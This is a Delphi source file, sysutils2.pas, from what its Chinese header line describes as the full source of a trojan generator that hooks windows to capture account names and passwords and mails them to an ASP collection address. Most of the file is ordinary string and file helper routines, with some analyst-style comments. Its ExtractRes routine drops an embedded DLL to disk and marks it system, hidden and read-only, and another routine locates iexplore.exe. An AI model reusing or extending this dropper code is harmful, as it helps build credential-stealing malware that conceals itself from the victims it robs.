
📄 sysutils2.pas

📁 面对面 木马生成器 完整代码 程序仅提供测试学习 全局钩子查找句柄截获 使用ASP收信 收信地址明文(测试而已没加密) //本软件主要是截获账号和密码 带了个简单发信
        MOV     ESI,EAX
        MOV     EDI,EDX
        MOV     EBX,ECX
        XOR     AL,AL
        TEST    ECX,ECX
        JZ      @@1
        REPNE   SCASB
        JNE     @@1
        INC     ECX
@@1:    SUB     EBX,ECX
        MOV     EDI,ESI
        MOV     ESI,EDX
        MOV     EDX,EDI
        MOV     ECX,EBX
        SHR     ECX,2
        REP     MOVSD
        MOV     ECX,EBX
        AND     ECX,3
        REP     MOVSB
        STOSB
        MOV     EAX,EDX
        POP     EBX
        POP     ESI
        POP     EDI
end;

{ Converts a NUL-terminated character pointer into a Pascal string.
  The conversion is the compiler's built-in PChar-to-string copy; the
  pointer itself is not inspected here. }
function StrPas(const Str: PChar): string;
begin
  Result := string(Str);
end;

{function Inttostr(const Int: integer): string;
var
  d, m: integer;
  A:boolean;
begin
  if Int=0 then
  begin
    result:='0';
    exit;
  end;
  result:='';
  A:= int >= 0;
  if A then m := int
  else m := -int;
  result:='';
  while m <> 0 do
  begin
    d := m mod 10;
    m := m div 10;
    Result := chr(d + 48) + Result;
  end;
  if not A then Result:='-'+Result;
end;
}

{ Returns S without leading and trailing characters whose code is less
  than or equal to that of a space (blanks and control characters).
  An input made up only of such characters yields the empty string. }
function Trim(const S: string): string;
var
  First, Last: Integer;
begin
  Result := '';
  First := 1;
  Last := Length(S);
  // Skip leading blanks/control characters.
  while (First <= Last) and (S[First] <= ' ') do
    Inc(First);
  // Nothing but blanks: keep the empty result.
  if First > Last then
    Exit;
  // At least one non-blank exists at or after First, so this loop stops.
  while S[Last] <= ' ' do
    Dec(Last);
  Result := Copy(S, First, Last - First + 1);
end;

{ Case-insensitive comparison of two NUL-terminated strings.

  Under Delphi's default register calling convention Str1 arrives in EAX
  and Str2 in EDX. The routine measures Str2 (terminator included) and
  compares that many bytes of Str1 against it. On a byte mismatch both
  bytes are folded to upper case if they lie in 'a'..'z' and compared
  again; only that ASCII range is folded.

  Returns 0 when the strings match, otherwise the difference between the
  folded mismatching bytes (Str1 byte minus Str2 byte).

  Neither pointer is tested for nil before it is dereferenced. }
function StrIComp(const Str1, Str2: PChar): Integer; assembler;
asm
        PUSH    EDI
        PUSH    ESI
        // EDI = Str2, ESI = Str1
        MOV     EDI,EDX
        MOV     ESI,EAX
        // Scan Str2 for its NUL terminator; afterwards NOT ECX is the
        // number of bytes scanned, terminator included.
        MOV     ECX,0FFFFFFFFH
        XOR     EAX,EAX
        REPNE   SCASB
        NOT     ECX
        // Rewind EDI to the start of Str2 and clear EDX for the byte math.
        MOV     EDI,EDX
        XOR     EDX,EDX
        // Compare bytes while they are identical and the count lasts.
@@1:    REPE    CMPSB
        // Count exhausted with every byte equal: EAX is still 0.
        JE      @@4
        // Mismatch: fold the Str1 byte to upper case if it is 'a'..'z'.
        MOV     AL,[ESI-1]
        CMP     AL,'a'
        JB      @@2
        CMP     AL,'z'
        JA      @@2
        SUB     AL,20H
        // Same folding for the Str2 byte.
@@2:    MOV     DL,[EDI-1]
        CMP     DL,'a'
        JB      @@3
        CMP     DL,'z'
        JA      @@3
        SUB     DL,20H
        // Equal after folding (EAX becomes 0): resume the comparison.
        // Otherwise EAX holds the signed difference that is returned.
@@3:    SUB     EAX,EDX
        JE      @@1
@@4:    POP     ESI
        POP     EDI
end;

{ Returns the last-write time of FileName as a packed DOS date/time
  value, or -1 when the name cannot be found, refers to a directory, or
  the timestamp cannot be converted.

  The lookup uses FindFirstFile, so the name is resolved the way that
  API resolves it; the search handle is closed before the result is
  examined. }
function FileAge(const FileName: string): Integer;
var
  SearchHandle: THandle;
  Info: TWin32FindData;
  LocalTime: TFileTime;
begin
  Result := -1;
  SearchHandle := FindFirstFile(PChar(FileName), Info);
  if SearchHandle = INVALID_HANDLE_VALUE then
    Exit;
  Windows.FindClose(SearchHandle);
  // Directories are reported as "no such file".
  if (Info.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) <> 0 then
    Exit;
  FileTimeToLocalFileTime(Info.ftLastWriteTime, LocalTime);
  // The DOS date lands in the high word and the DOS time in the low word
  // of Result; a failed conversion resets Result to the error value.
  if not FileTimeToDosDateTime(LocalTime, LongRec(Result).Hi,
    LongRec(Result).Lo) then
    Result := -1;
end;

{ Reports whether FileName names an existing file. The answer is derived
  from FileAge, so anything FileAge reports as -1 (including a
  directory) counts as "does not exist". }
function FileExists(const FileName: string): Boolean;
var
  Age: Integer;
begin
  Age := FileAge(FileName);
  Result := not (Age = -1);
end;

{function FileExists(const FileName: string): Boolean;
var
  FileData: TWin32FindData;
    //After FindFirst/FindNext has located a file, this type gives access to its attributes, size, modification time and similar information
  hFile: Cardinal;
begin
  hFile := FindFirstFile(pChar(FileName), FileData);
  if (hFile <> INVALID_HANDLE_VALUE) then
  begin
    Result := True;
    Windows.FindClose(hFile);
  end
  else
    Result := False;
end;
}

{ Opens an existing file and returns its Win32 handle cast to Integer,
  or -1 when Mode is out of range.

  Mode combines an access selector in its low two bits (index into
  AccessMode) with a sharing selector in bits 4..7 (index into
  ShareMode). The file is opened with OPEN_EXISTING, so it is never
  created here. When CreateFile itself fails, its return value is passed
  through unchanged. }
function FileOpen(const FileName: string; Mode: LongWord): Integer;
const
  AccessMode: array[0..2] of LongWord = (
    GENERIC_READ,
    GENERIC_WRITE,
    GENERIC_READ or GENERIC_WRITE);
  ShareMode: array[0..4] of LongWord = (
    0,
    0,
    FILE_SHARE_READ,
    FILE_SHARE_WRITE,
    FILE_SHARE_READ or FILE_SHARE_WRITE);
var
  AccessSel, ShareSel: LongWord;
begin
  AccessSel := Mode and 3;
  ShareSel := Mode and $F0;
  // Reject selectors that would index past either lookup table.
  if (AccessSel > fmOpenReadWrite) or (ShareSel > fmShareDenyNone) then
  begin
    Result := -1;
    Exit;
  end;
  Result := Integer(CreateFile(PChar(FileName), AccessMode[AccessSel],
    ShareMode[ShareSel shr 4], nil, OPEN_EXISTING,
    FILE_ATTRIBUTE_NORMAL, 0));
end;

{ Moves the file pointer of Handle by Offset relative to Origin and
  returns what the platform call returns (SetFilePointer on Windows,
  __lseek on Linux). Only the low 32 bits of the position are handled:
  the high-part pointer passed to SetFilePointer is nil. }
function FileSeek(Handle, Offset, Origin: Integer): Integer;
var
  NewPos: Integer;
begin
  {$IFDEF MSWINDOWS}
  NewPos := SetFilePointer(THandle(Handle), Offset, nil, Origin);
  {$ENDIF}
  {$IFDEF LINUX}
  NewPos := __lseek(Handle, Offset, Origin);
  {$ENDIF}
  Result := NewPos;
end;

{ Creates FileName for reading and writing and returns the Win32 handle
  cast to Integer. CREATE_ALWAYS is used, so an existing file of that
  name is truncated, and the share mode of 0 means no other open of the
  file succeeds while this handle is held. A failed CreateFile is
  returned as the cast of its result. }
function FileCreate(const FileName: string): Integer;
var
  NewHandle: THandle;
begin
  NewHandle := CreateFile(PChar(FileName), GENERIC_READ or GENERIC_WRITE,
    0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
  Result := Integer(NewHandle);
end;

{ Writes Count bytes from Buffer to Handle.
  Returns the number of bytes the platform call reports as written, or
  -1 when the Windows WriteFile call fails. The caller has to compare
  the result with Count to detect a short write. }
function FileWrite(Handle: Integer; const Buffer; Count: LongWord): Integer;
{$IFDEF MSWINDOWS}
var
  Written: LongWord;
{$ENDIF}
begin
  {$IFDEF MSWINDOWS}
  if WriteFile(THandle(Handle), Buffer, Count, Written, nil) then
    Result := Integer(Written)
  else
    Result := -1;
  {$ENDIF}
  {$IFDEF LINUX}
  Result := __write(Handle, Buffer, Count);
  {$ENDIF}
end;

{ Closes a handle previously returned by FileOpen or FileCreate.
  The result of the platform call is discarded, so a failed close is not
  reported to the caller. }
procedure FileClose(Handle: Integer);
{$IFDEF MSWINDOWS}
var
  NativeHandle: THandle;
{$ENDIF}
begin
  {$IFDEF MSWINDOWS}
  NativeHandle := THandle(Handle);
  CloseHandle(NativeHandle);
  {$ENDIF}
  {$IFDEF LINUX}
  // Closing also drops every lock held on the descriptor.
  __close(Handle);
  {$ENDIF}
end;

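{ Compares at most MaxLen characters of two NUL-terminated strings using
  the current user's locale (CompareString with LOCALE_USER_DEFAULT and
  no flags).

  Returns CompareString's result minus 2: negative when S1 sorts first,
  0 when the compared ranges are equal, positive when S2 sorts first.
  A failed CompareString call (return value 0) therefore yields -2.

  Each length handed to CompareString is clamped to the string's own
  terminator. Passing MaxLen unchanged for both strings made the API
  read MaxLen characters from each buffer even when a string ended
  sooner, i.e. it read past the terminator of the shorter string. }
function StrLComp(S1, S2: PChar; MaxLen: Cardinal): Integer;
var
  Len1, Len2: Cardinal;
begin
  // Bounded scan: never look beyond MaxLen and never beyond the NUL.
  Len1 := 0;
  if S1 <> nil then
    while (Len1 < MaxLen) and (S1[Len1] <> #0) do
      Inc(Len1);
  Len2 := 0;
  if S2 <> nil then
    while (Len2 < MaxLen) and (S2[Len2] <> #0) do
      Inc(Len2);
  Result := CompareString(LOCALE_USER_DEFAULT, 0,
    S1, Len1, S2, Len2) - 2;
end;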

{ Case-insensitive comparison of two Delphi long strings.

  S1 arrives in EAX and S2 in EDX (register calling convention). Each
  length is read from the dword stored 4 bytes before the string data; a
  nil pointer (empty string) is treated as length 0. The shorter length
  bounds the byte comparison. On a mismatch both bytes are folded to
  upper case if they lie in 'a'..'z'; no other characters are folded.

  Returns the difference of the first pair of bytes that still differ
  after folding, or Length(S1) - Length(S2) when the common prefix is
  equal. }
function CompareText(const S1, S2: string): Integer; assembler;
asm
        PUSH    ESI
        PUSH    EDI
        PUSH    EBX
        // ESI = S1 data, EDI = S2 data
        MOV     ESI,EAX
        MOV     EDI,EDX
        // EAX = length of S1 (0 for nil)
        OR      EAX,EAX
        JE      @@0
        MOV     EAX,[EAX-4]
        // EDX = length of S2 (0 for nil)
@@0:    OR      EDX,EDX
        JE      @@1
        MOV     EDX,[EDX-4]
        // ECX = the smaller of the two lengths (unsigned compare)
@@1:    MOV     ECX,EAX
        CMP     ECX,EDX
        JBE     @@2
        MOV     ECX,EDX
        // Force ZF=1 so a zero count falls through the JE below as "equal".
@@2:    CMP     ECX,ECX
@@3:    REPE    CMPSB
        // Common prefix equal: the result is the length difference.
        JE      @@6
        // Mismatch: fold the S1 byte to upper case if it is 'a'..'z'.
        MOV     BL,BYTE PTR [ESI-1]
        CMP     BL,'a'
        JB      @@4
        CMP     BL,'z'
        JA      @@4
        SUB     BL,20H
        // Same folding for the S2 byte.
@@4:    MOV     BH,BYTE PTR [EDI-1]
        CMP     BH,'a'
        JB      @@5
        CMP     BH,'z'
        JA      @@5
        SUB     BH,20H
        // Equal after folding: continue with the remaining bytes.
@@5:    CMP     BL,BH
        JE      @@3
        // Still different: return the difference of the folded bytes.
        MOVZX   EAX,BL
        MOVZX   EDX,BH
@@6:    SUB     EAX,EDX
        POP     EBX
        POP     EDI
        POP     ESI
end;

{ Deletes FileName and reports whether the platform call succeeded
  (Windows.DeleteFile on Windows, unlink on Linux). No reason for a
  failure is returned. }
function DeleteFile(const FileName: string): Boolean;
var
  Target: PChar;
begin
  Target := PChar(FileName);
{$IFDEF MSWINDOWS}
  Result := Windows.DeleteFile(Target);
{$ENDIF}
{$IFDEF LINUX}
  Result := not (unlink(Target) = -1);
{$ENDIF}
end;

{ Maps the platform id reported by GetVersionEx to a small code:
    1 = VER_PLATFORM_WIN32s
    2 = VER_PLATFORM_WIN32_WINDOWS
    3 = VER_PLATFORM_WIN32_NT
    0 = any other value
  NOTE(review): the return value of GetVersionEx is ignored, so after a
  failed call the platform id tested below is whatever the record
  happened to contain. }
function judgesys:integer;
var
  Info: TOSVersionInfo;
begin
  Info.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  GetVersionEx(Info);
  if Info.dwPlatformId = VER_PLATFORM_WIN32s then
    Result := 1
  else if Info.dwPlatformId = VER_PLATFORM_WIN32_WINDOWS then
    Result := 2
  else if Info.dwPlatformId = VER_PLATFORM_WIN32_NT then
    Result := 3
  else
    Result := 0;
end;

{ Returns the Windows system directory with a trailing backslash.
  NOTE(review): the result of GetSystemDirectory is not checked; if the
  call fails, the buffer is converted to a string without ever having
  been filled in. }
function Gesy :string;
var
  Buf: array [0..255] of Char;
  Dir: string;
begin
  GetSystemDirectory(Buf, 255);
  Dir := Buf;
  // Append the separator unless the path already ends with one.
  if Copy(Dir, Length(Dir), 1) <> '\' then
    Dir := Dir + '\';
  Result := Dir;
end;

{ Returns True when GetVersionEx reports the NT platform id
  (VER_PLATFORM_WIN32_NT) and False otherwise.
  NOTE(review): the return value of GetVersionEx is not checked. }
function WinisNT :Bool;
var
  Info: OSVERSIONINFO;
begin
  Result := False;
  Info.dwOSVersionInfoSize := SizeOf(OSVERSIONINFO);
  GetVersionEx(Info);
  if Info.dwPlatformId = VER_PLATFORM_WIN32_NT then
    Result := True;
end;

// Extracts the embedded DLL resource to a file on disk
{ Writes a resource embedded in the running module to the file OutName
  and returns True when the WriteFile call succeeds.

  ResType / ResName identify the resource inside HInstance; OutName is
  the destination path and is created with CREATE_ALWAYS.

  Analyst note: after the write, the output file is given the
  SYSTEM + HIDDEN + READONLY attributes, which keeps it out of Explorer's
  default view. A process that writes one of its own resources to disk
  and then sets these attributes on it is a useful behavioural indicator
  for file-creation and attribute-change telemetry.

  NOTE(review): the number of bytes written (N) is never compared with
  Size, so a short write is still reported as success. }
function ExtractRes(ResType, ResName, OutName: string): Boolean;
var
  HResInfo: THandle;
  HGlobal: THandle;
  HFile: THandle;
  Ptr: Pointer;
  Size, N: Integer;
begin
  HFile := INVALID_HANDLE_VALUE;
  // Single-pass repeat..until True: each Break is an early exit to the
  // cleanup code below.
  repeat
    Result := False;
    // Locate the resource in this module, load it and get a pointer to it.
    HResInfo := FindResource(HInstance, PChar(ResName), PChar(ResType));
    if HResInfo = 0 then Break;
    HGlobal := LoadResource(HInstance, HResInfo);
    if HGlobal = 0 then Break;
    Ptr := LockResource(HGlobal);
    Size := SizeOfResource(HInstance, HResInfo);
    if Ptr = nil then Break;
    // Share mode 0 and CREATE_ALWAYS: exclusive access, existing file replaced.
    HFile := CreateFile(PChar(OutName), GENERIC_READ or GENERIC_WRITE,
      0, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
    if HFile = INVALID_HANDLE_VALUE then Break;
    if WriteFile(HFile, Ptr^, Size, LongWord(N), nil) then Result := True;
  until True;
  if HFile <> INVALID_HANDLE_VALUE then CloseHandle(HFile);
  // Runs on every path, including the failure paths above; its result is ignored.
  SetFileAttributes(PChar(OutName), FILE_ATTRIBUTE_SYSTEM or FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_READONLY);
end;



{ Builds a path to iexplore.exe by taking the drive prefix (everything
  up to and including the first ':') of the system directory returned by
  Gesy and appending a fixed "\program files\internet explorer\" path.
  The path is assembled from constants only; nothing checks that the
  file exists at that location. }
function IEPath: string;
begin
  Result := Gesy;
  // Cut everything after the first ':' ...
  Delete(Result, Pos(':', Result) + 1, Length(Result));
  // ... keep the text up to that ':' and append the fixed remainder.
  Result := Copy(Result, 0, Pos(':', Result)) +
    '\program files\internet explorer\iexplore.exe';
end;



end.
